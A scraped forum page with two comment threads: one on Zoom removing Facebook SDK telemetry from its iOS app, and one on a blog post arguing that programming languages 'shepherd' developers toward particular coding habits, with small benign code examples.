So did they just... remove Facebook login? Doesn't seem that likely. Maybe the FB SDK has some flags you can set.

Operyl(4133) about 12 hours ago [-]

> 'We will be removing the Facebook SDK and reconfiguring the feature so that users will still be able to login with Facebook via their browser. ...'

It sounds like they're just no longer using the Facebook SDK outright (which provides a slightly more 'native'/'nicer' login flow for apps). They're going to do what most apps do (at least, in my personal experience) and just show a webview with a redirect back into the app, which doesn't call out to Facebook at all.

EDIT: That is, it doesn't call out to Facebook at all until you start the login flow, which is just opening a browser view to the OAuth2 flow.
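
(For reference, the browser-based alternative is plain OAuth 2.0: the app opens Facebook's authorization URL in a browser and later exchanges the returned code for a token over HTTPS, with no Facebook code running in-process. A rough sketch with hypothetical client credentials; the dialog and token endpoints are Facebook's documented OAuth endpoints, and the `requests` package is assumed.)

    import requests

    CLIENT_ID = "YOUR_APP_ID"                            # hypothetical
    REDIRECT_URI = "https://example.com/auth/callback"   # hypothetical

    # Step 1: open this URL in a real browser; no SDK runs inside the app.
    auth_url = (
        "https://www.facebook.com/v6.0/dialog/oauth"
        f"?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}&state=xyz"
    )

    # Step 2: the browser redirects back with ?code=...; exchange it for a token.
    def exchange_code(code: str, client_secret: str) -> dict:
        resp = requests.get(
            "https://graph.facebook.com/v6.0/oauth/access_token",
            params={
                "client_id": CLIENT_ID,
                "redirect_uri": REDIRECT_URI,
                "client_secret": client_secret,
                "code": code,
            },
        )
        resp.raise_for_status()
        return resp.json()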

Hokusai(10000) about 10 hours ago [-]

Using the Facebook SDK is a rookie mistake. It includes all kinds of telemetry that is sent to Facebook, whether the user is connected to Facebook or not.

At the company I worked for, they read the code (you have access to it) and stripped those parts out. It's not much work, but it's a pain.

The best approach is to use just the HTTP APIs and ignore the SDK. Your team will better understand how Facebook works, your app will be lighter, and you are free from nasty surprises that a third party may add to your app without your knowledge.

mianos(10000) about 4 hours ago [-]

This is kind of exactly what they said it didn't do.

shbooms(10000) about 10 hours ago [-]

Headline should technically read:

'Zoom Removes Code That Sends Data to Facebook when you first open the app'

as per the article:

'Motherboard downloaded the update and verified that it does not send data to Facebook upon opening.'

It's a bit naive to assume that just because they don't send the data right away, it's not getting sent at some point later on.

noahtallen(10000) about 10 hours ago [-]

> we decided to remove the Facebook SDK in our iOS client and have reconfigured the feature so that users will still be able to log in with Facebook via their browser.

Since they removed the Facebook SDK entirely, whatever mechanism Facebook used to collect the info doesn't exist any more. Instead of being able to collect the data at all times, wouldn't FB only have a vector to do so through the web login? At that point, I assume they could do fingerprinting in the browser to collect some info, but at least they cannot do it at the system level any more.

It still seems like this is a big improvement. Though, I imagine most folks will have at least one other app using the FB SDK, so it's not like the root cause is fixed.

narendranag(4342) about 10 hours ago [-]

Considering how many apps are using Facebook's SDK, shouldn't this be something that FB should be addressing? After all, they are the ones making an SDK available to app developers to help with user-login. Shouldn't the presumption of trust rest on FB?

designcode(10000) about 9 hours ago [-]

I can't see the big deal. We use the Facebook SDK specifically for the free analytics. It's just a default part of the SDK. It's not sending anything any other analytics package wouldn't

proactivesvcs(10000) about 10 hours ago [-]

If Zoom 'takes its users' privacy extremely seriously' and their 'customers' privacy is incredibly important' then why would they be releasing software without a strong knowledge of what third party code they're adding in, and what exfiltration might be happening as a result? They hold user privacy in such high regard and yet are releasing a program without even hooking it up to a network monitor for five minutes?

Someone's lying here.

squaresmile(10000) about 8 hours ago [-]

While I think one shouldn't read too much into PR statements like those, I don't think it's useless to call them out either, especially when they use very strong words like 'extremely seriously' and 'incredibly important'.

If the defense is that the practice is common, then there isn't anything special about Zoom regarding user privacy, is there?

ricardobeat(3649) about 10 hours ago [-]

This is absolutely common. Business will require tracking/authentication/etc, contracts will be signed, developers will implement the provided SDK. Nobody will inspect the data being sent.

> releasing a program without even hooking it up to a network monitor for five minutes

How many times have you seen anyone do that? Unfortunately that is the reality - my personal take is to simply try to avoid vendor libraries at all costs, but it's hard to sell.

holografix(3904) about 10 hours ago [-]

I for one don't think Zoom is being malicious here. I imagine plenty of other apps out there are doing the same right now, by naïvely making use of FBook's SDK.

anonu(2536) about 10 hours ago [-]

I noticed today that the mic was 'muted' on zoom. I chimed in on the video call I was on and the window flashed a reminder that I was 'muted'.

So clearly the mic itself is not muted - the software is still listening.

Not sure how I felt about that given all the recent Zoom privacy revelations.

untog(2451) about 10 hours ago [-]

FWIW Google Hangouts/Meet does the same thing. It's actually a pretty useful feature... as long as you trust the company implementing it, I guess.

klyrs(4341) about 10 hours ago [-]

Yeah, my light's still on when I'm not sharing video and I hate it

shostack(4340) about 10 hours ago [-]

I feel like this is a common video chat feature. Given that the option to mute while in the chat is likely done most frequently through their UI vs the system settings, this seems to be an appropriate use of monitoring input to ensure the user is able to avoid common problems.

There seem to be some legitimate concerns about privacy worth discussing further but I'm not sure this is one of them.

holografix(3904) about 10 hours ago [-]

Your mic is never "muted"; the software just isn't transmitting the audio anywhere. If you want to mute it for real, unplug it.

dannyw(4045) about 7 hours ago [-]

It's not fair to be attacking zoom so much over this. They took prompt action as soon as they were aware.

harry8(4324) about 6 hours ago [-]

As soon as they were aware of the thing they themselves did.

So they don't know what they're doing? Really? How does that defense go in criminal trials?

luckylion(10000) about 5 hours ago [-]

> They took prompt action as soon as they were aware.

They took prompt action because they were attacked so much over this.

dx87(10000) about 10 hours ago [-]

It's good that they removed it, but it's also disappointing that they had no idea it was happening until someone made a blog post about it. Do their employees not vet any of the code they use, and just slap things together off the internet and hope it's not doing anything their users won't like?

banana_giraffe(4266) about 10 hours ago [-]

Between this and the HTTP server, it feels like the Zoom of old that wrote the app was more willing to make the user-experience-vs-user-privacy trade-off in favor of user experience.

Now you need to log in via Facebook in a separate browser window, and thanks to the HTTP change, you need to click through a browser dialog to launch a meeting from a link. So they've either changed their policy to err more towards the privacy side and haven't found all the cases yet, or, more likely, they still have the same attitude except when the tech world starts screaming at them.

kelnos(3940) about 9 hours ago [-]

> Do their employees not vet any of the code they use, and just slap things together off the internet

That sounds like a pretty accurate description of how software is built. (No, I'm not being flippant.)

> ... and hope it's not doing anything their users don't like?

I expect most don't think too much about it, not out of malice, but because their product manager told them 'I want FB login' and to do that, they either spend an afternoon using the FB SDK, or spend a week figuring out how it works, implementing it from scratch themselves, and debugging the inevitable interop issues with whatever oauth2 (or whatever) library they've picked. It's really a no-brainer... few developers can take the week-long route and then justify that to their manager. They'll get fired.

xiphias2(10000) about 10 hours ago [-]

It's the official SDK of one of the biggest companies. I can't fault them on not catching this. What Facebook does is ugly.

floatingatoll(4062) about 10 hours ago [-]

To rephrase this into something more beneficial to others trying to learn from this:

'It's good that they removed it, and it goes to show just how important it is to inspect your application's wire traffic as part of your development and testing processes. Otherwise you'll have no idea what's happening until someone makes a blog post about it.'

chmike(2915) about 5 hours ago [-]

I guess it was not known that the Facebook SDK did something as nasty as this.

bvandewalle(10000) about 5 hours ago [-]

It's an imported library. Almost nobody vets those libraries ever. And that's the current state of software supply chain.

perfectstorm(4333) about 9 hours ago [-]

They can't see what happens inside the Facebook SDK's code. Even if they could see it, good luck convincing the PMs and directors to avoid implementing Facebook login.

aurbano(4343) about 7 hours ago [-]

What if mobile platforms (iOS, Android...) changed the security/privacy policy so that apps had to request a "network access" permission, either whitelisting the domains they want to talk to or asking for wildcard access?

Most apps shouldn't need wildcard access, and the mobile device could show a warning when an app requests it, teaching users to be careful with that app.

This way, at least when you installed Zoom, for example, it would say something like:

"Zoom is requesting network access to:

  • zoom.us
  • analytics.tracker.example.com
  • facebook.com"

And then everyone would know. It still doesn't solve the underlying problem, but it would probably make companies more reluctant to add third-party analytics and SDKs.
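
(Purely hypothetical sketch of what such a declarative manifest and check might look like; nothing like this exists on iOS or Android today, and all names are made up.)

    # The app declares its allowed hosts up front; the OS would enforce it.
    ALLOWED_HOSTS = {
        "zoom.us": "core functionality",
        "analytics.tracker.example.com": "third-party analytics",
        "facebook.com": "Facebook login",
    }

    def may_connect(host: str) -> bool:
        return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)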

saagarjha(10000) about 5 hours ago [-]

Most apps are extremely chatty and prompts like these may not end up being useful.

lultimouomo(3182) about 5 hours ago [-]

Nice way to bury the innocuous-sounding 'iOS Advertiser ID' in the middle of the list. What 'iOS Advertiser ID' means is, to a very good degree of approximation, your deanonymized identity.

Also, the fact that just linking the SDK into your app deanonymizes the user to Facebook is very, very clear in its documentation. It's not like Zoom didn't notice until someone told them. They made a decision, and now they're changing it because they were called out.

andreasley(3648) about 3 hours ago [-]

The Advertising Identifier is app-specific, and if Limit Ad Tracking is enabled, it is set to all zeros. So it's not accurate to say that it's 'your deanonymized identity'.

enitihas(3534) about 4 hours ago [-]

They are changing it because right now they are growing like crazy without needing to do much user acquisition, and bad PR is just too costly right now. But it's good to see them doing it.

envy2(3486) about 4 hours ago [-]

The list is in alphabetical order. It's not malicious...

pyt(10000) about 10 hours ago [-]

I contacted LG last month regarding their use of the Facebook SDK's automatic event collection in their ThinQ Android app. They responded and told me that they're disabling it in an upcoming release (incidentally, today's). If a single email is all it took to get a company with over $50 billion in revenue to disable Facebook's tracking in one of their apps, I really don't think that these companies are sharing data intentionally.

What justification does Facebook have for keeping automatic event collection turned on by default in its SDKs? Why can't they enable it only when the user has explicitly opted in (https://developers.facebook.com/docs/app-events/gdpr-complia...)? They even say, 'you need to ensure that your SDK implementation meets these [GDPR] consent requirements.'
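
(The opt-out the SDK does document, per the GDPR page linked above, is an Info.plist flag that keeps automatic event logging off until the app explicitly re-enables it after obtaining consent:)

    <key>FacebookAutoLogAppEventsEnabled</key>
    <false/>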

nh2(3145) about 10 hours ago [-]

> I don't think these companies are sharing data with Facebook intentionally.

That would imply they are incompetent and negligent.

Would one not expect large companies like LG to have internal security and privacy reviews of the software they publish, and know very well what they are doing?

> What justification

Their core business.





Historical Discussions: It's not what programming languages do, it's what they shepherd you to (March 26, 2020: 462 points)

(466) It's not what programming languages do, it's what they shepherd you to

466 points 2 days ago by ingve in 1st position

nibblestew.blogspot.com | Estimated reading time – 3 minutes | comments | anchor

How many of you have listened, read or taken part in a discussion about programming languages that goes like the following:

Person A: 'Programming language X is bad, code written in it is unreadable and horrible.'

Person B: 'No it's not. You can write good code in X, you just have to be disciplined.'

Person A: 'It does not work, if you look at existing code it is all awful.'

Person B: 'No! Wrong! Those are just people doing it badly. You can write readable code just fine.'

After this the discussion repeats from the beginning until either one gets fed up and just leaves.

I'm guessing more than 99% of you readers have seen this, often multiple times. The sad part is that even though this happens all the time, nobody learns anything and the discussion simply begins anew. Let's see if we can do something about this. A good way to go about it is to try to come up with a name and a description for the underlying issue.

shepherding: An invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered 'better' in some sense. These may include things like long-term maintainability, readability and performance.

This is a bit abstract, so let's look at some examples.

Perl shepherds you into using regexps

Perl has several XML parsers available and they are presumably good at their jobs (I have never actually used one so I wouldn't know). Yet, in practice, many Perl scripts do XML (and HTML) manipulation with regexes, which is brittle and 'wrong' for lack of a better term. This is a clear case of shepherding. Text manipulation in Perl is easy. Importing, calling and using an XML parser is not. And really all you need to do is to change that one string to a different string. It's tempting. It works. Surely it could not fail. Let's just do it and get on with other stuff. Boom, just like that you have been shepherded.

Note that there is nothing about Perl that forces you to do this. It provides all the tools needed to do the right thing. And yet people don't, because they are being shepherded (unconsciously) into doing the thing that is easy and fast in Perl.
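
(The same shepherding exists in other scripting languages; here is a sketch of the two paths in Python, since the contrast is language-independent. The document and names are made up.)

    import re
    import xml.etree.ElementTree as ET

    doc = '<config><server host="old.example.com" port="80"/></config>'

    # Shepherded: the quick regex works on this input and breaks on the next.
    hacked = re.sub(r'host="[^"]*"', 'host="new.example.com"', doc)

    # The 'right' way: parse, modify, serialize.
    root = ET.fromstring(doc)
    root.find("server").set("host", "new.example.com")
    proper = ET.tostring(root, encoding="unicode")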

Make shepherds you into embedding shell pipelines in Makefiles

Compiling code with Make is tolerable, but it fails quite badly when you need to generate source code, data files and the like. The sustainable solution would be to write a standalone program in a proper scripting language that has all the code logic needed and call that from Make with your inputs and outputs. This rarely happens. Instead people think 'I know, I have an entire Unix userland available [1], I can just string together random text mangling tools in a pipeline, write it here and be done'. This is how unmaintainability is born.

Nothing about Make forces people to behave like this. Make shepherds people into doing this. It is the easy, natural outcome when faced with the given problem.
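
(A sketch of the standalone-generator approach, with hypothetical file names; the Makefile rule then shrinks to something like `table.h: table.csv; python3 gen_table.py $< $@` instead of a shell pipeline.)

    #!/usr/bin/env python3
    # gen_table.py: turn a CSV of key,value pairs into a C header.
    # Hypothetical example of logic that would otherwise become an
    # unmaintainable sed/awk pipeline inside a Makefile.
    import csv
    import sys

    def main(src, dst):
        with open(src, newline="") as f:
            rows = list(csv.reader(f))
        with open(dst, "w") as out:
            out.write("/* generated by gen_table.py, do not edit */\n")
            for key, value in rows:
                out.write("#define %s %s\n" % (key.upper(), value))

    if __name__ == "__main__":
        main(sys.argv[1], sys.argv[2])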

Other examples

  • C shepherds you into manipulating data via pointers rather than value objects.
  • C++ shepherds you into providing dependencies as header-only libraries.
  • Java does not shepherd you into using classes and objects, it pretty much mandates them.
  • Turing complete configuration languages shepherd you into writing complex logic with them, even though they are usually not particularly good programming environments.
[1] Which you don't have on Windows. Not to mention that every Unix has slightly different command line arguments and semantics for basic commands meaning shell pipelines are not actually portable.




All Comments: [-] | anchor

djyde(4040) 1 day ago [-]

You read the code. The computer programs you.

collyw(4322) 1 day ago [-]

There is probably more truth in this than people realise at first glance.

btilly(774) 1 day ago [-]

It is the language plus the community. And not just the language.

As an example, there is nothing about Ruby that makes it more or less prone to monkey-patching than many other dynamic languages. But once a certain number of popular frameworks did that, there was no getting away from that. (Rails even has a convention around where you put your monkey patches.)

pansa2(10000) 1 day ago [-]

> there is nothing about Ruby that makes it more or less prone to monkey-patching than many other dynamic languages.

Python disallows making changes to fundamental types like `int` and `list`. It's not possible for a Python framework to support something like Rails' `2.days.ago`.

Interestingly, I don't think this was an explicit decision made when designing Python - it's just a side effect of the built-in types being written in C rather than in Python itself.
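
(A quick illustration of that difference; the exact TypeError message varies by Python version.)

    # Built-in types refuse monkey-patching, so a Rails-style `2.days.ago`
    # can't be bolted onto int:
    try:
        int.days = property(lambda self: self * 86400)
    except TypeError as e:
        print(e)  # e.g. "can't set attributes of built-in/extension type 'int'"

    # User-defined classes, by contrast, are freely patchable:
    class Duration:
        def __init__(self, seconds):
            self.seconds = seconds

    Duration.in_hours = lambda self: self.seconds / 3600
    print(Duration(7200).in_hours())  # 2.0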

joelbluminator(4198) 1 day ago [-]

You're talking about ActiveSupport probably, and I really love it. It augments Ruby in a very beautiful way.

I really like 2.days.ago

There were zero times where I wished it wouldn't do that.

But to each his own.

chipperyman573(4050) 1 day ago [-]

For anyone (like me) who doesn't know what monkey patching is, wikipedia says it is 'dynamic modifications of a class or module at runtime, motivated by the intent to patch existing third-party code as a workaround to a bug or feature which does not act as desired'

https://en.wikipedia.org/wiki/Monkey_patch

PeterStuer(4304) 1 day ago [-]

My take was always that language quality is not about expressive power, because it's fairly difficult to come up with a non-Turing-complete system anyway; it is about what is easy to understand and modify.

collyw(4322) 1 day ago [-]

Isn't it a balance?

VB6 code was easy to understand on one level, but its lack of expressiveness led to a lot more code. On the other hand, when I look at Ruby code there is too much syntactic sugar for a non-Ruby programmer to understand it without looking some things up.

DeathArrow(10000) 1 day ago [-]

ZX Spectrum BASIC shepherded you into using the GOTO keyword, which I've heard is the single most evil thing to do in software development.

onion2k(2103) 1 day ago [-]

In Speccy BASIC a GOTO jumped to a line number, so if you added code that changed your numbering, the GOTO broke. That was managed by using numbers that left space (10, 20, and so on), but it was still horrible in a big program. Another issue was that you couldn't return (that's what GOSUB was for). GOTOs also made code hard to follow because the execution jumped around all over the place, but that was less of a problem.

These days languages that have GOTO usually jump to a label so it's not quite as bad. They're still likely to end up as spaghetti though.

And yes, I am old.

mickduprez(4337) 1 day ago [-]

Be the shepherd, use Lisp :D

Seriously though, what languages other than Lisp (all the mainstream ones, at least) give you the freedom to change the language and/or create DSLs with the same ease? And you can still do your 'bare metal' in C if you really, really need to and bring it in.

mikekchar(10000) 1 day ago [-]

> what other languages [...] give you the freedom to change the language and/or create DSL's [...]

FORTH. It's a very similar language from that respect. One of the first things you learn how to do as a FORTH developer is to rewrite the interpreter/compiler words.

agentultra(4245) 1 day ago [-]

Haskell, OCaml, probably F# too.

Can also do 'bare metal' as well.

I think the advantage to Lisp is that the programmer can generate and evaluate arbitrary expression trees at run time.

I'm not sure about the others but I recall Haskell has some difficulty with this. It's possible but it's not supported and not trivial to do.

elamje(3815) 1 day ago [-]

Working on a project with a C# DSL really makes you appreciate the magic of Lisp.

gameswithgo(4226) 1 day ago [-]

Almost all languages can pull in C, so that doesn't differentiate Lisp.

As for being able to build DSLs, you have to ask how often that is useful. What happens when 10 DSLs are built into a code base and you hire a new person? How hard is it to make sense of everything?

brundolf(1518) 1 day ago [-]

I actually think the OP perfectly explains the core problem with Lisp: Part of the value of shepherding is getting everyone on the same page. When everyone's their own shepherd, nobody is on the same page.

JoeAltmaier(10000) 1 day ago [-]

If all you have is a hammer, everything looks like a nail.

lsh(2879) 1 day ago [-]

My favourite when working in teams is: 'use the right tool for the right job', which presupposes you know many tools and have experience working with them ... and that the shared set of tool knowledge in the team is more than just a hammer and a nail.

muglug(4235) 1 day ago [-]

This also can change over time. For example, 15 years ago PHP shepherded you to include every file you were using explicitly, making it hard to reason about a given project if you weren't the creator.

A big effort ensued to change that — class autoloading became the standard, and a large community arose around that standard.

Similarly, JavaScript shepherded you towards some bad practices that the community has now found ample remedies for.

pitterpatter(4244) 1 day ago [-]

> This also can change over time. For example, 15 years ago PHP shepherded you to include every file you were using explicitly, making it hard to reason about a given project if you weren't the creator.

Huh, that seems backwards to me? Wouldn't the explicit approach make it more obvious what scripts were relevant?

elevenoh(10000) 1 day ago [-]

'shepherding: An invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered 'better' in some sense'

Seems like most could lend a little more weight to: 'does this language align with how you want to think about/represent the problems you're solving?'

hinkley(4243) 1 day ago [-]

The corollary for language and API designers: whatever you make easiest is what people will do.

If there is a 'right' way to do something, make that the default or the simplest calling pattern. If there is a new 'right' way, don't route the new way directly through the old way. People will think they're cutting out the middleman by keeping the old calling convention as long as possible.

eyegor(3707) 1 day ago [-]

I agree with all the points brought up in this article except for this curveball:

> Turing complete configuration languages shepherd you into writing complex logic with them

Everything discussed in this post is a consequence of language design or best practices. I don't think shoving complex logic into yaml files would be considered either. This is more a possibility as a result of Turing completeness, I don't think the language design has anything to do with it. All the other 'shepherding' examples are clearly intentional choices by the language designers.

jdfellow(10000) 1 day ago [-]

I think the author of the article is specifically speaking of configuration DSLs that were intended to be Turing-incomplete but somehow grew full Turing-completeness and therefore became bastard languages. YAML as a config DSL is sub-par (but I'll take it over JSON any day), and truly declarative, Turing-incomplete config languages are great, as is just using a fully-featured scripting language such as a Lisp or Python, but the middle ground, a custom config language that is also Turing-complete, is usually just bad.

Not sure I have any examples of what that might be. Perhaps nginx? or apache? Lots of complex software have very complex config languages that might accidentally be Turing-complete, but only fools would actually use them like that.

taeric(2653) 1 day ago [-]

It is a funny choice of examples. I configure Emacs with script. And, while I certainly have some bitrot in my config, it is still way more manageable than any other config I have had to deal with.

fsloth(4328) 1 day ago [-]

Although not obvious from the context, the writer of the article is the author of a build system (https://mesonbuild.com/) used in a bunch of large non-trivial high profile projects (https://mesonbuild.com/Users.html) including systemd, Nautilus and so on.

While I dislike proof-by-eminence the author has history as an original, recognized contributor in this space.

chrisweekly(4088) 1 day ago [-]

Title reminds me of 'guide you to the pit of success' (ie, a slippery slope w a positive ending), which IIRC I first encountered in a post by Zeit cofounder G Rauch, writing about NextJS.

golergka(2697) 1 day ago [-]

That's exactly what I thought about. I think this is the blog post that made this phrase popular: https://blog.codinghorror.com/falling-into-the-pit-of-succes...

savolai(4344) 1 day ago [-]

The term for this in the field of human machine interaction is (perceived) affordance, popularized by Norman.

This sounds like less active guidance than nudging or shepherding. Creating affordances is still an active design choice though.

https://en.wikipedia.org/wiki/Affordance

http://johnnyholland.org/2010/04/perceived-affordances-and-d...

ricardobeat(3649) about 14 hours ago [-]

Not sure the concept applies cleanly here. Affordance is about perceiving possibilities from an interface or environment.

For programming language idioms, the main factors are the restrictions or patterns the language offers and how naturally they fit their context, not just the user's perception.

gameswithgo(4226) 1 day ago [-]

Something I like about Rust is that it shepherds you toward fast-running programs and away from null pointer errors.

Something I like about Go is that it shepherds you to write code any other Go programmer can follow easily.

Something I dislike about C# is that it has the tools to let you write very, very fast code but shepherds you toward non-devirtualized interfaces over heap-allocated classes tied together with LINQ overhead.

pjmlp(200) 1 day ago [-]

That is the beauty of languages like C#: productivity and security first, while providing the tools to go down the performance well if actually needed.

capableweb(2015) 1 day ago [-]

> Something I like about Go is that it shepherds you to write code any other Go programmer can follow easily

Sure, the syntax and indentation levels are all the same, but that's not really the difficult part of programming. The difficulty comes from abstractions, indirections and other abstract things that Go, just like any language, lets you do however you want.

There are of course codebases written in Go where the indirections make no sense and are hard to follow, just as in any language.

What Go shepherds you into is writing really verbose code (well, compared to most languages except Java, I guess), where everything is explicit unless hidden behind indirection. This is both a blessing and a curse.
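
The textbook instance of that verbose-but-explicit trade-off is Go's error handling. A small sketch (the file name is hypothetical):

    package main

    import (
        "fmt"
        "os"
    )

    // loadGreeting shows what Go shepherds you into: no exceptions, no
    // hidden control flow, the same explicit branch after every call
    // that can fail. Verbose, but nothing happens off-screen.
    func loadGreeting(path string) (string, error) {
        data, err := os.ReadFile(path)
        if err != nil {
            return "", fmt.Errorf("read %s: %w", path, err)
        }
        return string(data), nil
    }

    func main() {
        greeting, err := loadGreeting("greeting.txt")
        if err != nil {
            fmt.Fprintln(os.Stderr, err)
            os.Exit(1)
        }
        fmt.Println(greeting)
    }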

elamje(3815) 1 day ago [-]

I spend a fair amount of time in C# and don't think about performance much unless it's obvious, O(N^2)-type stuff. I'm always trying to level up, so I would appreciate some tips.

What tooling are you referring to that will make C# really fast?

Also, what are you referring to with non-devirtualized interfaces vs heap classes with LINQ?

DeathArrow(10000) 1 day ago [-]

To allocate things on the stack you have to either use only value types or use unsafe code. That is fine for small performance-critical sections, but it will introduce bugs and hinder productivity if used across large code bases.

LoveMortuus(10000) 1 day ago [-]

Is shepherding present in every aspect of life?

My guess would be that it is and that shepherding is what we talk about when we say that we can learn from every aspect of life.

If what I wrote is correct, then shepherding is the teacher of reality. But I guess it's on us to decide when we've learned enough and move on.

I was at first wanting to ask if shepherding is present in video games as well, but then I realized what shepherding could actually be.

SHEPHERDING: The part of an aspect that _can_ teach you something.

_can_, because it's up to you to decide if you'll learn anything.

Is shepherding always negative or can it be positive?

Also, if we would always strive to fix what shepherding teaches us, would that mean that in an infinite amount of time we would reach perfection?

And, last question I swear: is shepherding subjective or objective? Or is it both?

Sammi(10000) 1 day ago [-]

https://en.wikipedia.org/wiki/Nudge_theory

'Nudge is a concept in behavioral science, political theory and behavioral economics which proposes positive reinforcement and indirect suggestions as ways to influence the behavior and decision making of groups or individuals. Nudging contrasts with other ways to achieve compliance, such as education, legislation or enforcement.'

'A nudge makes it more likely that an individual will make a particular choice, or behave in a particular way, by altering the environment so that automatic cognitive processes are triggered to favour the desired outcome.'

m12k(10000) 1 day ago [-]

Shepherding is when some behavior is encouraged by being made easy/rewarded, or by other behavior being made harder/punished. So shepherding absolutely happens in every aspect of life - systems move toward low energy states, water flows downhill and living creatures tend to follow the path of least resistance. When parents do it, we call it parenting. When governments or companies do it (via taxes/subsidies or pricing), we call it nudging. When groups do it, we call it socialization.

It's a really useful lens for analyzing systems and organizations: look not just at what they make possible, but also at what they encourage and discourage. Most of the time, the latter is what really matters (the average case usually determines the long-term impact of something, not the best or the worst case). When Netflix has auto-play at the end of a stream, it shepherds you toward binging. When Animal Crossing has things you need to wait wall-clock time for, it encourages you not to binge. When free-to-play games come with loot boxes, they don't force you to do anything, but they might still be shepherding gambling-like behavior.

pietroppeter(4213) 1 day ago [-]

I like the concept, and I particularly like the ways I feel nim shepherds me:

* I very rarely need to come up with a name for a function or other identifier; the correct name can be reused for multiple use cases thanks to the type system and proc overloading
* to spend a little time designing the interface before jumping into the code
* but also to think about what I really need to accomplish and get to it, instead of building a grandiose architecture
* to have consistent APIs
* to steer away from OOP
* to rely on minimal dependencies, and to be kind of minimal in general
* to use the correct tool for the problem (macros are not easy to write, and that's good, otherwise you would abuse them; they are great to use, though)
* to build maintainable code
* ...

I would be interested in what other nimmers think counts as good shepherding.

One might also think about what nim's bad shepherding is, although nothing comes to mind at the moment.

beagle3(2793) about 23 hours ago [-]

> * to use the correct tool for the problem (macros are not easy to write, and that's good, otherwise you would abuse them; they are great to use, though)

Just wanted to add: Nim has macros (which are comparable to Lisp forms) and templates, which are closer to C and Lisp macros and are much harder to abuse. It also has built-in inlining and generics, which cover the prime uses of templates and macros in languages that lack them.

It also has term rewriting macros, which let you state things like 'whenever you see x*4 and x is an integer, use x shl 2 instead', so that you CAN apply your knowledge in the places where you know better than the compiler, while still writing the code you meant to write (multiply by 4) rather than the assembly you wanted to generate.

Right t